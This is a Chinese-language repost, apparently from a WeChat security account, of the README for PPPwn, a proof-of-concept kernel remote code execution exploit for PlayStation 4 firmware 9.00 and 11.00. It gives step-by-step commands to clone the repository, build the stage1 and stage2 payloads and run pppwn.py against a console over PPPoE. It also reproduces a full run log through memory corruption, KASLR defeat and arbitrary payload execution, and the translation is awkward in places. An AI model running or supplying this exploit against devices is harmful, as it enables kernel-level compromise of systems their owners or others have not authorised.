PPPwn 是适用于 PlayStation 4 至 FW 11.00 的内核远程代码执行漏洞。这是CVE-2006-4304的概念验证漏洞,已负责任地向 PlayStation 报告。
支持的版本有:
-
固件 9.00
-
固件 11.00
-
可以添加更多内容(欢迎 PR)
该漏洞仅PPPwned作为概念验证打印在您的 PS4 上。为了启动 Mira 或类似的自制软件,stage2.bin需要调整有效负载。
要求
-
带以太网端口的计算机
-
USB 适配器也可以使用
-
以太网电缆
-
Linux
-
您可以使用 VirtualBox 创建一个 Linux VM,并将其
Bridged Adapter作为网络适配器以使用 VM 中的以太网端口。 -
安装了Python3和gcc
用法
在您的计算机上,克隆存储库:
git clone --recursive https://github.com/TheOfficialFloW/PPPwn安装要求:
sudo pip install -r requirements.txt编译有效负载:
make -C stage1 FW=1100 clean && make -C stage1 FW=1100make -C stage2 FW=1100 clean && make -C stage2 FW=1100
对于其他固件,例如 FW 9.00,请传递FW=900。
运行漏洞利用程序(请参阅 参考资料ifconfig获取正确的接口):
sudo python3 pppwn.py --interface=enp0s3 --fw=1100对于其他固件,例如 FW 9.00,请传递--fw=900。
在你的 PS4 上:
-
转到
Settings然后Network -
选择
Set Up Internet connection并选择Use a LAN Cable -
选择
Custom设置并PPPoE选择IP Address Settings -
输入
PPPoE User ID和的任何内容PPPoE Pasword -
选择和
AutomaticDNS SettingsMTU Settings -
选择
Do Not Use用于Proxy Server -
单击
Test Internet Connection即可与您的计算机通信
如果漏洞利用失败或 PS4 崩溃,您可以跳过互联网设置,只需单击Test Internet Connection。如果pppwn.py脚本卡在等待请求/响应,请中止它并在您的计算机上再次运行它,然后单击Test Internet Connection您的 PS4。
如果该漏洞有效,您应该会看到类似于下面的输出,并且您应该会在 PS4 上看到Cannot connect to network.后面打印的内容。PPPwned
运行示例
[+] PPPwn - PlayStation 4 PPPoE RCE by theflow[+] args: interface=enp0s3 fw=1100 stage1=stage1/stage1.bin stage2=stage2/stage2.bin[+] STAGE 0: Initialization[*] Waiting for PADI...[+] pppoe_softc: 0xffffabd634beba00[+] Target MAC: xx:xx:xx:xx:xx:xx[+] Source MAC: 07:ba:be:34:d6:ab[+] AC cookie length: 0x4e0[*] Sending PADO...[*] Waiting for PADR...[*] Sending PADS...[*] Waiting for LCP configure request...[*] Sending LCP configure ACK...[*] Sending LCP configure request...[*] Waiting for LCP configure ACK...[*] Waiting for IPCP configure request...[*] Sending IPCP configure NAK...[*] Waiting for IPCP configure request...[*] Sending IPCP configure ACK...[*] Sending IPCP configure request...[*] Waiting for IPCP configure ACK...[*] Waiting for interface to be ready...[+] Target IPv6: fe80::2d9:d1ff:febc:83e4[+] Heap grooming...done[+] STAGE 1: Memory corruption[+] Pinning to CPU 0...done[*] Sending malicious LCP configure request...[*] Waiting for LCP configure request...[*] Sending LCP configure ACK...[*] Sending LCP configure request...[*] Waiting for LCP configure ACK...[*] Waiting for IPCP configure request...[*] Sending IPCP configure NAK...[*] Waiting for IPCP configure request...[*] Sending IPCP configure ACK...[*] Sending IPCP configure request...[*] Waiting for IPCP configure ACK...[+] Scanning for corrupted object...found fe80::0fdf:4141:4141:4141[+] STAGE 2: KASLR defeat[*] Defeating KASLR...[+] pppoe_softc_list: 0xffffffff884de578[+] kaslr_offset: 0x3ffc000[+] STAGE 3: Remote code execution[*] Sending LCP terminate request...[*] Waiting for PADI...[+] pppoe_softc: 0xffffabd634beba00[+] Target MAC: xx:xx:xx:xx:xx:xx[+] Source MAC: 97:df:ea:86:ff:ff[+] AC cookie length: 0x511[*] Sending PADO...[*] Waiting for PADR...[*] Sending PADS...[*] Triggering code execution...[*] Waiting for stage1 to resume...[*] Sending PADT...[*] Waiting for PADI...[+] pppoe_softc: 0xffffabd634be9200[+] Target MAC: xx:xx:xx:xx:xx:xx[+] AC cookie length: 0x0[*] Sending PADO...[*] Waiting for PADR...[*] Sending PADS...[*] Waiting for LCP configure request...[*] Sending LCP configure ACK...[*] Sending LCP configure request...[*] Waiting for LCP configure ACK...[*] Waiting for IPCP configure request...[*] Sending IPCP configure NAK...[*] Waiting for IPCP configure request...[*] Sending IPCP configure ACK...[*] Sending IPCP configure request...[*] Waiting for IPCP configure ACK...[+] STAGE 4: Arbitrary payload execution[*] Sending stage2 payload...[+] Done!
项目地址:
https://github.com/TheOfficialFloW/PPPwn
原文始发于微信公众号(Ots安全):PPPwn - PlayStation 4 至 FW 11.00 的内核远程代码执行漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论